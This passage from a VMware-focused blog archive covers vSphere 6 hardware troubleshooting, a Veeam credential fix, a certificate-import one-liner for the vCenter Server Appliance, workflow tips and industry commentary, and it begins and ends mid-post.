Intel Xeon X5650 2.67GHz processors and about 296GB RAM. Since we added a 2nd nVIDIA card, we also needed to upgrade the Host power supplies to support the 2 cards’ power consumption (1200W support). In addition, we only had one 2-port Fiber Adapter in each Host. We wanted to add another for redundancy. The Adapter model used is HP FlexFabric10Gb 2-port 554FLR-SFP Adapter. Upon booting the Host after adding both the 2nd Adapter and the 2nd nVIDIA card, I experienced two issues: Before the POST, a RSOD (red screen of death) displayed stating: NMI Detected. Consult Integrated Management log for details and then after I resolved that error, and attempted the vSphere6 install, I received the following: When I reviewed the iLO log for the RSOD NMI error, I saw the following recurring messages: After many attempts searching the “interwebz” for a resolution to both issues, and having no luck, it was time to ping HP Support. After several correspondences with HP and attempting different configs, below is what was done to finally resolve each issue. I thought it would be worthwhile to share this with the community since 1. I found little to no posts on either issue in my resolution research, and 2. if anyone is using graphic cards to deliver visually-enhanced desktops as we are, this may prove beneficial and expedite any Host troubleshooting due to adding the aforementioned hardware. Resolution # NMI Error The 1st issue wasn’t too entirely difficult to figure out the cause, but was a bit cumbersome to figure out the resolution. The issue was caused by adding the 2nd Adapter in the 2nd riser card that also housed the 2nd nVIDIA card, as noted in the iLO log image shown above. To mitigate the NMI error, a BIOS setting needed changed: Enter the Setup Utility by pressing F9 during POST.[ Arrow down to the 2nd option – Power Management Options, then press ENTER. Arrow down to Advanced Power Management Options, then press ENTER. Arrow down to Maximum PCI Express Speed and press ENTER to change the setting to: Press ESC out of the Advanced Power Management Options window, ESC out of the Power Management Options winodw, then ESC again to exit out of the Setup Utility. When prompted, press F10 to Save and Exit the Utility and reboot the Host. Decompressed MD5: After I resolved the NMI error, I attempted to install vSphere6. After the Host detected the vSphere package, I selected to install it and it began to unpack it. Towards the end of the unpack phase, the Decompressed MD5 error displayed. To resolve this error, I did the following: I upgraded my BIOS to the latest version. As of the date of this post (12 Aug 15), the BIOS firmware latest release is dated 2 Aug 2014 (A), meaning it was ‘amended’ (13 Oct 2014); see this link: http://h20564.www2.hpe.com/hpsc/swd/public/detail?dwf.restartSession=true&sp4ts.oid=5194969&swItemId=MTX_e8d0275c17494b81b03e42bb3d&swEnvOid=4166#tab5 Press F9 to get into the main Setup Utility window (see Setup Utility image posted above). At the main Setup Utility window, press CTL+A, which will then add Service Options at the end of the list. Arrow down to Service Options and press ENTER; when in Service Options, arrow down to PCI Express 64-bit BAR Support. If this option is not set to Enabled, Press ENTER and set it to ENABLED. Press ESC out of the Service Options window, then ESC again to exit out of the Setup Utility. When prompted, press F10 to Save and Exit the Utility. After the Host reboots, re-attempt to Install ESXi. The Decompressed MD5 error should not display any longer. --- # ESXi Embedded Host Client URL: https://vNinja.net/vmware-2/esxi-embedded-host-client/ Date: 2015-08-12 Author: christian Tags: Awesome, VMware, vSphere, Web Client I almost choked on my coffee this morning when I saw William Lam announcing a new VMware Fling called ESXi Embedded Host Client. Finally the day when we can get a local vSphere Web Client on a standalone host is here, and it’s not a moment too soon. This feature has been missing since ESX 3 and it’s VMware Infrastructure Web Access. For now, this is a Fling (which means unsupported and so on), but I really hope that this ends up being built-in to ESXi very soon – even on the free vSphere Hypervisor. So, what does it look like? Well, to be honest it looks pretty darn awesome, and you know what? No Flash! Yes, it’s HTML5 baby! If you are running ESXi 6, installation is as easy as installing a .**vib **(in ESXi 5.5 there is a workaround to get it running, highlighted in Williams post). So, give it a spin and make sure to provide feedback on the Flings site to help ensure VMware sees that we as users of their products want this feature to be core to vSphere in upcoming releases. Make your voice heard, and make sure the team who is behind this get the credit they deserve. --- # Veeam Vanguard 2015 URL: https://vNinja.net/virtualization/veeam-vanguard-2015/ Date: 2015-07-27 Author: christian Tags: Award, Vanguards, Veeam Veeam has been “silently” working on their own global influencer program, and the inaugural list of Veeam Vanguards was published today. I am thrilled to be selected amongst the first 31 people awarded this title, it’s quite an exclusive list! So what’s up with the name? Well, here is one of the definitions of vanguard I found: vanguard ˈvanɡɑːd/ noun a group of people leading the way in new developments or ideas. Sounds rather fitting if you ask me, at least if that’s the rationale behind it. One other definition I found was the “the foremost part of an advancing army or naval force”, which does sound kind of scary. Anyhow, I’m glad to be considered and even more happy that I was selected among the first batch. For more details, read Veeam’s announcement, or have a look at the Veeam Vanguard Program profile page (Warning, link does contain pictures). --- # It's Time to End the Add on Insanity URL: https://vNinja.net/rant/time-add-insanity/ Date: 2015-07-13 Author: christian Tags: Adobe, Flash, Rant, Security For the third time in a week, researchers have discovered a zero-day vulnerability in Adobe’s Flash Player browser plugin. Like the previous two discoveries, this one came to light only after hackers dumped online huge troves of documents stolen from Hacking Team — an Italian security firm that sells software exploits to governments around the world. This quote is from [Brian Krebs](http://Third Hacking Team Flash Zero-Day Found), who very rightfully goes on to advise that everyone “please consider removing or at least hobbling this program.” Now, that is fine for the most part. I mean, who really needs Adobe Flash these days? Don’t most services we use have other methods of handing us the content we need want? The Apple iPhone doesn’t have Adobe Flash, so why do we need it on our laptops? The fact is, that most end users probably don’t need to have Adobe Flash installed any more, but a lot of us sysadmins do. Why? Well, in my world one major culprit is the VMware vSphere Web Client. The Web Client has gotten it’s fair share of ill-repute over the last few years, but the latest edition in vSphere 6 is pretty responsive and quite pleasant to use. That’s until you contemplate that it still needs Adobe Flash installed on the client. The same goes for any other admin interface that requires Adobe Flash, or even Java for that matter. Any administrative interface that requires a browser add on to work, should be bagged, kidnapped and flung in the back of a van and driven off somewhere never to be seen again. Sure, I understand that it’s no easy task to rework all of these interfaces, and it takes real effort by skilled people. But please, please make it happen as soon as possible, and retrofit it it into your existing systems - don’t keep those stuck on older releases hanging, and only provide a solution for the latest and greatest version. While we as admins and consultants are used to having to patch our systems, and keep current, please help us limiting our own attack surface by removing requirements for add ons and “special juice” just to be able to administer the solutions we depend upon to keep our businesses running. That can’t be too much to ask, can it? --- # Ravello Offers Free Lab Service for all 2015 vExperts URL: https://vNinja.net/virtualization/ravello/ Date: 2015-06-19 Author: christian Tags: AWS, Lab, Nested ESXi, Ravello, vExpert Ravello Systems has announced free lab service for all 2015 vExperts, which offers 1,000 free CPU hours per month for personal or home lab use. I was lucky enough to be one of the early VMware on AWS VIP Pass users, and I’ve been working on several setups the last few weeks. Hopefully I’ll be able to make those available as blueprints in the new Ravello Repo, once they are ready for publishing. My experience with Ravello Systems so far can be summed up with one word: Awesome. The ability to quickly fire up a test environment, especially with nested ESXi hosts, is fantastic. In fact, a lot of the things I’ve been using my home lab for, has been transitioned over and run on demand on Ravello instead. The CPU and RAM requirements for a home lab has increased dramatically over the last few years, and the investment needed in hardware makes it difficult to keep it up to date. Now, my existing home lab can work for some workloads and scenarios, others run on AWS via Ravello when I need them. It’s the best of both worlds, just the way I like it. --- # The "vCommunity" URL: https://vNinja.net/rant/vcommunity/ Date: 2015-04-03 Author: christian Tags: Community, Rant The recent months, and weeks, has made me question the value of the “vCommunity”. I’m even questioning if there really is such a thing at all any more. I believe there was such a thing at one point, but it seems to be fading fast into history, only to be replaced by hyperbole of egonormous proportions. Back in the old days, and this might just be me showing my greying of beards moment, the hyperbole wasn’t a strong a force as it seems to be today. As clickbait replaces journalism, hyperbole and FUD seems to be replacing what used to be based on technical merit. I don't really understand why people spend enormous amounts of time on something, to just turn around and shit l over it. — Christian Mohn™ (@h0bbel) April 2, 2015 Yes there is a typo in there, it was supposed to read “I don’t really understand why people spend enormous amounts of time on something, to just turn around and shit all over it.” Sure, I get it. You want to make a buck, and a name for yourself. This is completely understandable, I do the same thing. We all do, let’s not kid ourselves and pretend we live in la la land where life is beautiful all the time, and we are all working together towards a better world, or even a better tomorrow. The truth is, we are not collectively working towards anything but our own self indulgence or self worth, or whatever might seem to be the best “move” at any given time. Harsh? You bet. Reality? It sure is. Take a moment, and read of what Anthony Burke wrote in his Remember your Technical Integrity post. I simply could not agree more. If you chose to sacrifice your technical, or even moral, integrity for another paycheque, be my guest - That is your prerogative. Just don’t whine if I call you out on it, or simply stop listening to you. Just as you make your own choices, I sure as hell will be making mine. Please don’t take this the wrong way, I’m not saying that you can’t change your opinion about something. Or change employers. That’s perfectly fine, completely natural, and even healthy - Changing your personality, well probably not as healthy. Also, it probably shows that your previous “personality” wasn’t real either. Again, not so healthy. I’m pretty sure that’s where unicorns come from. Fake personalities, with hidden agendas. I won’t kid myself into thinking that I can influence this trend in any way, shape or form, and things will go back to being what it once was, but I sure can make sure that I don’t fall into the same trap myself. If I ever fall into the same category, by all means tell me, or even better take me out back and give me a good old fashioned beating. As someone I respect once said about the community: There is none… It is a bunch of dicks and egos. --- # VMware Software Manager - Changing Download Directory URL: https://vNinja.net/virtualization/vmware-software-manager-changing-download-directory/ Date: 2015-03-13 Author: christian Tags: VMware, VMware Software Manager, vSphere 6 The new VMware Software Manager, which was released at the same time as vSphere 6, is a great way to get your download ducks in a row, and not manually download all the different vSphere pieces one by one. But all these downloads sure eat up disk space, and if you, like me, chose the wrong download location while installing VMware Software Manager what do you do? There is no way in the web interface to change the download directory after installation, so how do you change it? There is a way through the GUI as well, but here is how to do it manually: It turns out that the configuration is stored in %appdata%\VMware\Software Manager\Download Service\Cfg\application.cfg, specifically under the [download] section. To change your download location, move your existing directory to a new location, and update the path under directory=. Then use Task Manager to kill the vsm_download_service.exe task(s) that are running, and restart it from the C:\Program Files\VMware\Software Manager\Download Service directory and you should be all set to download to the new location. Update # It turns out, that you can in fact change this setting through the GUI as well, just not via the web interface. If you right click the VMware Software Manager icon in your tray, you can change the location by choosing the Settings->Change Download Location option. I completely overlooked that when trying to change the location at first. --- # vVotemageddon 2015 URL: https://vNinja.net/virtualization/vvotemageddon-2015/ Date: 2015-03-02 Author: christian Tags: blogging, Vote As has become a yearly tradition, the vote is on. Pick your favorite VMware & virtualization blogs and give Eric Siebert loads of work. Been a not fun few days trying to get that survey launched - 72,000 characters in the input file I had to build — Eric Siebert (@ericsiebert) March 2, 2015 I hope the good guys at Infinio who sponsors Top vBlog 2015 also offers some assistance in doing some of the legwork required to get the results accumulated. Also, don’t be an ass. Go cast your vote now. # --- # Starting a VMUG URL: https://vNinja.net/virtualization/starting-vmug/ Date: 2015-02-27 Author: christian Tags: Community, Norway, VMUG Last year, in November, the first ever meeting in VMUG Norway took place in my hometown of Bergen, and since then there has been meetings in Oslo, Trondheim and a second one in Bergen as well. Getting the Norwegian VMUG up and running was a long process. I decided to have a go at it, and I spent a lot of time talking to people, thinking, planning and generally wondering how we could get it started and how to proceed. Some might say an inordinate amount of time, and they are right. I’m lucky to have talented and passionate people on board with me for this, this is not something I have done on my own. But, someone had to get the ball rolling. It turns out, that all you need to get a VMUG running in your local area, is to arrange one. It is really that simple. Don’t over think it and don’t overcomplicate things. It really isn’t that hard, and honestly, it really doesn’t take that much effort either. Start small. A small venue, and a few people goes a long way. Admittedly, the Norwegian VMUG is small in comparison to our Danish counterparts, but we all have to start somewhere, right? Sure, we can grow bigger and better, and of course we will learn and improve as we go along. I for one is really excited by the possibilities VMUG Norway has going forward, and I hope the attendees share our passion for growing the local community. If they do, I’m sure VMUG Norway is destined for success and growth. If you plan on starting a local VMUG, just remember one thing: It is all about the U(sers), not the leadership or even the sponsors. Keep that in mind, and you’re ready to go. --- # Do you ChangeLog? URL: https://vNinja.net/workflow/changelog/ Date: 2015-02-18 Author: christian Tags: ChangeLog, Ideas, Markdown, Workflow In my work as a consultant I often have many small tasks to perform for customers, all while completing a bigger project. I have found that an easy way to keep track of all the little and big changes, is to create a ChangeLog. Normally ChangeLog’s are referenced in development projects, but it also sense to use it to track of your own, or your team members, changes to an infrastructure environment. As for just about everything else, I use Markdown to make it easy to format and edit. Example # Currently, I use the following format to keep track of changes done to a customer environment Completed # Date Task By 14.02.2015 ChangeLog created CM 15.02.2015 Upgraded vCenter Operations Manager 5.8.3 Build 2076729 to 5.8.4 (Build 2199700) CM 16.02.2015 Updated _vCSA01_ from 5.5.0.20000 Build 2063318 til 5.5.0.20400 (Build 2442330) CM 16.02.2015 Updated _esxi01_ from 5.5.0 (Build 1623387) til 5.5.0 (Build 2456374) CM 16.02.2015 Updated _esxi02_ from 5.5.0 (Build 1623387) til 5.5.0 (Build 2456374) CM 16.02.2015 Updated _esxi03_ from 5.5.0 (Build 1623387) til 5.5.0 (Build 2456374) CM As you can see this a quick and easy way to document changes. Since the markdown files are pure text files, they can easily be converted to other formats with Pandoc, or checked into a “code”-repository for easy retrieval. Do you use a ChangeLog for your infrastructure, or how do you quickly document changes in your environment? --- # The Real Value of the VCDX Certification URL: https://vNinja.net/virtualization/real-vcdx-certification/ Date: 2015-02-11 Author: christian Tags: Certification, Epiphany, Framework, TOGAF, VCDX, VMware The VMware Certified Design Expert: VCDX. THE certification of certifications, especially if you work with VMware based solutions. It’s often regarded as the holy grail of certifications, and rightfully so. But why is this the case, and why does “everyone” want to become one? The reasons for it being such a highly coveted title, are pretty obvious: Very few people can call themselves VCDX, at the time of writing only 186 people have successfully defended their design. 1 It represents something beyond being able to do well on a computerized test. You have to have actual soft skills as well, and be able to present advanced technical subjects in a coherent manner, in a possibly daunting environment. 2 It is the highest level of certification you can obtain within the world of VMware. I have, on numerous occasions, stated that my goal is to some day become a VCDX, and it still is. But the fact is that the more I study the requirements and the more I think about it, the harder it becomes to achieve. This may sound counter-intuitive, but bare with me on this. At first glance, and I’m sure this doesn’t just apply to me, it seems fairly simple. Get your VCP, and VCAP’s in order, submit a design, get it verified, defend, and boom, instant VCDX. Certainly not easy, but how hard can it really be, right? But is that all there is to it? Simply put, no it is not. The VCDX program is about validating someone skills as an architect, not teaching people to become architects. There is a huge gap to be filled between the VCP and VCAPs and the VCDX. Last fall I took a class in TOGAF 9.1, and that was a real eye-opener. Architecture itself is more about methodology and frameworks, and less about technology. The VCDX places itself in both the methodology and the technology space, requiring candidates have one foot in each trench. That is a huge deal, and it really is like learning a new language, fluently. Until I had this revelation last year, I thought that the biggest obstacle to obtaining the VCDX certification would be to produce the documents required, in the specified form factor and present the design. That is not the case. The biggest hurdle is not documentation, it is not technology, and it’s not presentation skills. It is the mindset and architecture skills that breaks the camels back. It takes a special kind of person to be able to pull that off, and you know what? That is where the real value of the VCDX program lies. The more I learn, the more I realize that there is so much I don’t know. While the purpose of the VCDX program is to validate, not educate, I am learning a lot by trying to obtain the skill set required. Call it a side-effect, but it’s certainly not an adverse one. Who knows, I might never actually become a VCDX, but one thing is very, very clear; I’m learning a lot while I stumble my way towards it. It’s a moving target, but then again, what isn’t if you work with IT. Also, becoming a VCDX is not like beating that Final Boss in Doom II, it’s a new start, not and end. More than 186 people actually call themselves VCDX, and are outright lying. Check the official directory for verification. ↩ For a complete list of requirements, look at the official blueprint for the chosen track. --- # The vSphere 6.0 Launch and The Misinformation Effect URL: https://vNinja.net/vmware-2/vsphere-6-0-launch-misinformation-effect/ Date: 2015-02-10 Author: christian Tags: Beta, Misinformation, NDA, VMware, vSphere Have you ever wondered what happens if you give 10.000 people access to an open-beta that is supposed to be under NDA? Firstly, the NDA is no-go from the get-go. There is no way you can claim that you actually expect 10.000 people to not talk about something they know about. VMware vSpere 6.0 was the worst kept secret ever, for a reason. It might have been planned that way all along for all I know, but if that was the case, the NDA should never have been in place to begin with. Secondly, what happens when said product finally gets announced, and scores of people have pre-made blog content about all the new, and presumably secret, features? A lot of it is wrong, because people have been writing about features that have either been dropped or changed come release time. So, now what do you do? Well, VMware decided to “Clarify the misinformation”. I’m sorry, but all of this reads as a text-book way of not handling things. So, here is my own personal advice to VMware for the next round: Do # Decide on a beta format. If you do an open beta, drop the NDA and have people discuss it. If you do a closed beta, that’s fine too, invite people and slap a NDA on it. No problem. You can’t really have it both ways. If you solicit blog posts for publicity reasons during a launch event, do the bloggers a favor and tell them, beforehand, if something has changed or been dropped since the beta. If you don’t trust them to not leak information, what was the NDA worth to begin with? Don’t # Don’t solicit blog posts, and then call it misinformation if things have changed, and you haven’t informed anyone of it. That’s just plain rude. Come on VMware, you have been able to do things like this before, without this kind of problems. I’m sure you can do it again. As for the title for this post? Have a look at The misinformation effect. --- # Dude, where is my VAIO? URL: https://vNinja.net/virtualization/dude-vaio/ Date: 2015-02-03 Author: christian Tags: Gorilla, SanDisk, VAIO, vSphere 6 New Update: # Alex Jauch, VAIO Product Manager has provided an update on why there there has been so little information available, and when to expect that to change. Updated # Since this post was initially published, information about the VAIO capabilities in vSphere 6.0 has been published. In vSphere APIs for IO Filtering Ken Werneburg goes through the details on how it works, and how partners will get access through a SDK some time in the coming months. I guess that the lack of announcement hoopla at PEX regarding this is simply due to the SDK not being available at vSphere 6.0 time. I’m very glad to see VAIO talked about, and that it hasn’t gone completely AWOL. Original post # vSphere 6.0 was announced yesterday, with a bucketload of new features and capabilties. However, there seems to be a missing piece in the puzzle. Where did vSphere APIs for I/O Filters (VAIO), go? vSphere APIs for I/O Filters (VAIO), is simply put a framework that was to allow VMware partners to plug their products/features directly into the VM I/O Path. Basically this means that third-parties would be able to offer Data Services directly in the storage data stream. That opens up a world of possibilities, like compression, deduplication, and even cool stuff like distributed caching or native IO replication. All of this directly, without the need to leave the hypervisor. Keeping your Data Services close to the compute, that makes sense. Opening up for such tight integration is win-win for VMware, as they can offer their own services on top of the hypervisor, or let customers chose to run a third party filter. Either way, the hypervisor is the same, and it’s VMware’s ESXi. So, where is it? I can’t find a single reference to VAIO in the vSphere 6 release. Even SanDisk seem to be quiet about it, after announcing that they were VMware’s design partner on VAIO: SanDisk was selected to be VMware’s design partner for the APIs for IO Filtering for server-side solid-state caching, to help design and develop the APIs. The FlashSoft team at SanDisk are not only working on the API design, but we are actively working on implementing our next version of FlashSoft for vSphere based on the vSphere APIs for IO Filtering in ESXi 6.0. We plan to have our product ready for the launch of ESXi 6.0 early next year. Isn’t it a bit strange that this was a big deal back in August 2014, and come vSphere 6 announcement in February 2015, all is quiet on the western front? Other than the Storage Field Day Video, it seems a bit quiet at the moment? I guess no-one notices the gorilla after all. Not even the industry storage experts that seemingly also have overlooked the omission of any mention of VAIO in the vSphere 6 release. I guess this proves that the eyes is really the first thing that go blind… --- # A great disturbance in the Force URL: https://vNinja.net/virtualization/great-disturbance-force/ Date: 2015-02-02 Author: christian Tags: Agile, Speculation, VMware, Waterfall So, the cat formerly known as vSphere.next is finally out of it’s rather big bag, and vSphere 6.0 has been officially announced and will be available some time in Q1 (no date has been announced yet). There is enough of posts going into details on what is new and what has been announced, so I won’t be going over that right now. If you want to hear me talk about vSphere 6.0 and related news, you can always attend VMUG Norway on the 19th of february. I do however have some other comments to make, and perhaps some observations that might have passed below radar altitude in all the announcement hoopla. Some read this as “VMware is shifting to offering new features on their own cloud services first, then on premises later”, I don’t. I believe this means a monumental shift on how VMware is handling releases and offering new features. I wouldn’t be suprised if vSphere 6, and related products, is one of the last or even the last monolithic release they do. My take on this is that VMware is moving towards adopting more of a cloud culture in how in handles development. Goodbye waterfall development and Hello Agile development. Sure, Agile development and cloud provides checkboxes in any decent buzzword-bingo game, but if we are to believe in Cloud, DevOps and a truly Software Defined Data Center, the color of the development carpet needs to match the drapes. It’s not about treating on-premises customers as second class citizens, it’s about actually practicing what you preach. The next big thing might just start as a fling and end up as a feature, and you might not have to wait until v7.4 to get it. “Cloud first” doesn’t mean “vCloud Air first”, it just means that you and me can get our hands on the naughty bits earlier. I must admit, I kinda like that. Of course, all of this is just speculation. There might not be a carpet to match at all. --- # Veeam Backup & Replication 8: RPC error:Access is denied Fix URL: https://vNinja.net/virtualization/veeam-backup-replication-8-rpc-erroraccess-denied-fix/ Date: 2015-01-18 Author: christian Tags: Backup, Troubleshooting, Veeam I recently set up a new Veeam Backup & Replication v8 demo lab, and my intial small job that consisted of two different Linux VMs and one Windows Server 2012 R2 Domain Controller was chugging along nicely. I had one minor from the start though, and that was that file indexing consistently failed for the Windows VM. No big deal, but I thought it was strange at the time. After all, the Linux VMs were indexed just fine. Fast forward a few days, and all of a sudden Veeam B&R was unable to back up the Windows VM at all, failing with the following error: 18.01.2015 19:48:01 :: Processing Joey Error: Failed to check whether snapshot is in progress (network mode). RPC function call failed. Function name: [IsSnapshotInProgress]. Target machine: [192.168.5.5]. RPC error:Access is denied. Code: 5 Nothing had changed in my environment, no patches had been installed, no changes made to the backup job or the credentials used. I even tried deleting the job, this is a demo environment after all, and re-creating it, but with the same end result. As the Access is denied message clearly states, this had to be related to permissions somehow, but I was using domain administrator credentials (again, this is a lab), so all the required permissions should be in place, and the credentials test in the backup job also checked out just fine. It has also worked fine for 5 or 6 days, so I was a bit baffled. In the end, I tried changing from using User Principle Name (UPN) connotation of administrator@domain.local in the credentials for the VM, to using Down-Level Logon Name aka domain\administrator and retried the job. That did the trick, and it also fixed the indexing problems I’ve had since setting up the job in the first place. According to this Veeam Community Forum thread this was also a problem in v7 and has something to do with how the Microsoft API’s work. So, if your Veeam Backup & Replication jobs fail with access denied messages, and/or can’t index the VM files, check your credentials. They may work, but they might just be entered in the wrong format. --- # 2015: Let's DOS IT! URL: https://vNinja.net/misc/2015-dos-it/ Date: 2015-01-16 Author: christian Tags: 2015, Personal, Prediction Inspired by Scott Lowe’s Looking Ahead: My 2015 Projects, I’ve decided to do something similar. Since I didn’t post anything like this in 2014, I can’t really go back and see how my plans turned out, or provide any assessement of it. I can say this though, 2014 was pretty awesome. I got a promotion, my vExpert status was renewed, vNinja was voted in the top 50 of the 2014 top VMware & virtualization vote, I published a book and finally got the Norwegian VMUG up and running. My VCAP-DCA 550 should be on this list as well, and so should my failure in achieving VCAP-DCD certification status. 2014 was also the busiest year in vNinja.net’s history, with close to a doubling of traffic generated through the year. The same goes for vSoup, some of the episodes we recorded in 2014 had some rather insane listening numbers… Last year was also the year I realized that becoming a real proper IT-Architect takes work. Real work. I’m not there yet, but I will be. All in all, 2014 will stand as a good year for me professionally. Not perfect, but good. But here’s the thing; How much of this was planned and how much of it was made up on the fly? Honestly, most of it is due more to circumstances than deliberate actions on my part and that’s the main thing I want to change in 2015. 2014 is done and dusted, let’s get on with what’s to come. So here it is, my own 2015 bucket list. Completely master Markdown - I want Markdown to be a part of my muscle memory, so that I don’t have to think and look up formatting. The possibilities when combined with Pandoc are pretty amazing, and so far I’ve only scraped the surface. So, Markdown will be me go to markup language for just about anything I write in 2015. Get more organized - As mentioned before, things often happen without me actively seeking or planning to do something. This has to change in 2015. Getting more organized, and reducing the amount of digital clutter will help me focus on the thing that matter to me and my business. No, I’m not turning into a life coach, nor am I trying to be the most organized man in the world (Trust me, that will never happen), but I need to get my stuff together in a coherent manner - and stick to it. This is probably more of an effort than most people realize. Write better blog posts - This is an easy one, really. I have always regarded blog posting as a spur-of-the-moment thing, writing about something whenever I feel like it. Often written very quickly and posted immediately. I might still do quite a few of those posts in 2015, but I plan on really working on how I publish, when I publish and what I publish. Hopefully this will mean better blog posts, as I’ve always thought that quality beats quantity any day. Get that VCAP-DCD certification - If there is one single thing that 2014 thought me it is that if I want something, I have to make an effort. I was close on passing it, very close in fact. Perhaps it’s just my age starting to show, I don’t know, but I’m certain that if I genuinely try, I’ll get stuff done. I want to get this box ticked, in order to make the next step to VCDX. I don’t think 2015 will be the year I defend, but I sure want all the other tickboxes to be ticked as soon as possible. One does not simply become an architect. Redesign vNinja - vNinja will be redesigned in the near future. I´m not going the route of all the other cool kids, and move to some other publishing platform, but it will get a new, cleaner and simpler look. And that, as they say, are the broad strokes. There is a theme here, and the theme is pretty simple. In 2015, I will: Declutter, Organize and Simplify (DOS). I wish myself good luck. --- # Markdown All the Things! URL: https://vNinja.net/virtualization/markdown-things/ Date: 2015-01-12 Author: christian Tags: Automator, Content Creation, GitHub, Markdown, OS X, pandoc, Workflow Obviously I’m a bit late to the party here, but I guess late is better than never. It recently dawned on me that mucking about with lots of different file formats, interfaces and ways of doing things is rather counterproductive. A lot of my work these days are related to generating content, be it a simple blog post like this or writing customer proposals and documentation. In the end, the deliverables are often quite different, but at the core they are strangely enough very similar. After all, the main thing is content, right? The file format itself, or how it is generated, doesn’t really have a bearing on the content at all, it’s just a delivery method. Lipstick on a pig, if you will. So, in an effort to get rid of a lot of unnecessary visual and mental clutter , I’ve decided to go all in and Markdown all the things. After all, Markdown is just text, with some simple formatting options. No fluff, no convoluted UI’s, just text. Plain, simple, and very easy to work with. I currently use atom.io as my preferred editor, which is working out very well so far. Of course, from time to time my deliverables might just be a .PDF file, or even a Microsoft Word document, but there are ways to work with that and still keep Markdown as the core content creation engine. I’ve just put my first foray into Automator on GitHub. The Auto-convert .md to .docx is a simple Folder Action that runs pandoc to automatically convert files put into a given folder to .docx format. It’s simple and it’s crude, but it works. Next I’ll be looking into how I can use pandoc with a Microsoft Word reference file, to make sure that the generated files adhere to the corporate templates I normally use, but for now this does the job. I also plan on extending this to convert to other file formats as I need them, now that I’ve got this first one up and running. Do you use Markdown or pandoc? If so, please let me know how - I know I’m only scraping the surface of what is possible to do here, and any tips and hints on what do do next will be very welcome! Now, if only Evernote would support Markdown natively… --- # Importing vCloud Air SSL Certificate on the vCenter Server Appliance 5.x URL: https://vNinja.net/vmware-2/importing-vcloud-air-ssl-certificate-vcenter-server-appliance-5-x/ Date: 2014-12-12 Author: christian Tags: Certificate, SSL, vCenter, vCenter Web Client, vCloud Air, VCSA I’m playing around a bit with vCloud Air and Virtual Private Cloud OnDemand, and in order to set up the vCloud Hybrid Service plugin in the vSphere Web Client you need to import the vCloud Air SSL certificate into vCenter. If the certificate isn’t present in the vCSA keystore when you try to authenticate with vCloud Air, you get a “Server Certificate not Verified” error, and you will be unsuccessful in configuring the plugin. The Using the vCloud Hybrid Service vSphere Client Plug-in document outlines how this can be accomplished, but it’s based on downloading the SSL certificate via a browser and then importing it into the vCenter Keystore. Since I mostly run the vCenter Server Appliance, I didn’t want to bother with downloading it from one of my desktops, and copying the files over to the vCSA for import. I mean, there has to be a better way to do that, via the command line, right? Indeed there is, this little one-liner downloads and formats the certificate from vchs.vmware.com to /tmp on the vCSA, and then proceeds to import it into the keystore. echo -n | openssl s_client -connect vchs.vmware.com:443 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /tmp/vchs.cer && /usr/java/jre-vmware/bin/keytool -alias vchs -v -keystore /usr/lib/vmware-vsphere-client/server/configuration/keystore -storepass changeit -import -file /tmp/vchs.cer All you have to to is press ‘y’ to confirm the import: Trust this certificate? [no]: y Certificate was added to keystore [Storing /usr/lib/vmware-vsphere-client/server/configuration/keystore] vcenter:/tmp # And there it is, you can now add your vCloud Air credentials via the vSphere Web Client, without having to copy any files from your browser/desktop to the vCSA. --- # Combining Todoist and Evernote, because awesome URL: https://vNinja.net/workflow/combining-todoist-evernote-awesome/ Date: 2014-12-03 Author: christian Tags: automation, Evernote, IFTTT, Organization, Productivity, Todoist A while back I declared Evernote bankruptcy, even if I managed to misspell it while doing so: That's it, I'm declaring @evernote bankrupcy. — Christian Mohn™ (@h0bbel) May 22, 2014 The thing is, I really want to use Evernote in a proper and organised manner. The problem is; I was completely unable to do so, mostly since I had no clear idea on the how, the when and the why back when I started using it many moons ago. In the end, all I had was a lot of unorganised notes, with no clear idea or taxonomy. So, to get myself out of the mess I had made, I decided to delete all my notebooks, and stacks, and move every single note I had into a new @graveyard notebook. I then decided on a new top-level notebook hierarchy that I wanted to make general enough to fit most notes into, but still keep it reasonably structured. For now, I’ve decided on the following structure (I’ve excluded a couple here, but you get the gist): @Graveyard @Inbox @To-Do @To-Blog Personal Professional Clippings So far this works really well, and it’s easy to find a fitting notebook to place new notes in. I have yet to really do the required cleanup of tags to also make sure that I’m consistently using a sensible taxonomy, but I’m getting there slowly. For more tips on how you can organize Evernote, check out Matt Brenders The Non-obvious Guide to Evernote Awesomeness. I clearly need to have a closer look to the suggestions Matt has about using tags! I realize that the title of this post has nothing to do with how I managed to get control over my Evernote content again, but rather how I use it in conjunction with Todoist. So here it is; As with most other popular online services, both Todoist and Evernote integrate with IFTTT. I’ve set up a recipe that automatically creates a new note in my @To-Do notebook when a new task is added in Todoist. Pre-formatted notes like this makes it easy to fill out detailed information for the task in Evernote, without cluttering the Todoist tasks with information that is better stored and indexed in Evernote. The pre-formatted notes looks like this: In addition to this, I’ve created a saved search in Evernote called “Daily Review (any:any: created:day updated:day)” that shows me all notes that has been updated the same day, to give me a quick overview. Not quite GTD, but better than total anarchy and disarray. I also have IFTTT recipes for putting the tweets I favorite into Evernote, so I reference and move the ones I want to inspect further into either @To-Read or @To-Learn. So far, so good. At least there is some level of organization to my Evernote madness now, and that has to be a good thing. --- # EVO:RAIL: Doing the methmath. URL: https://vNinja.net/virtualization/hyperconvergence-meth-math/ Date: 2014-12-01 Author: christian Tags: EVO:RAIL, Hyperconverged, Licensing, VMware Howard Marks has published a post I’ve been meaning do myself, but to be honest, I’m glad Howard put it out there. His is way more researched and comprehensive than mine would ever have been. In his The True Cost Of Hyperconvergence article, Howard compares buying a new EVO:RAIL system, with building your own. Complete with the required hardware, licenses and support contracts. The result might come as a surprise to some… One question Howard doesn’t ask though is this; What happens to the bundled VMware licenses after the initial three years? The initial cost of the EVO:RAIL includes 3 years SnS, but what happens in year 4? I guess you can buy more years of support, and extend the period easily, but I have not verified this in any way. But this opens up for another question; What happens when you replace your EVO:RAIL after 3, 4 or 5 years? Do you have to buy a new one, complete with new licenses, even if you have paid SnS for the entire period, and what happens to the bundled VMware licenses when you replace your EVO:RAIL? As far as I can see, the licenses follow the hardware (think Microsoft OEM licensing here), so if you decide to replace it, you have to acquire new licenses for your new hardware. At least Microsoft offers OEM licenses at a discount. So it seems that not only do you not get discounted VMware licenses when you purchase an EVO:RAIL, you also don’t get to keep the licenses if you ever replace the hardware. Don’t get me wrong here, I love the EVO:RAIL concept and I had really high hopes for it, but sadly I feel that VMware has missed the mark here with quite some margin. In my opinion this could have made real ripples in a lot of datacenters, and helped smaller businesses “get with the SDDC program”, but with it’s current price point and licensing issues, I just don’t see it happening. As a concept it’s really 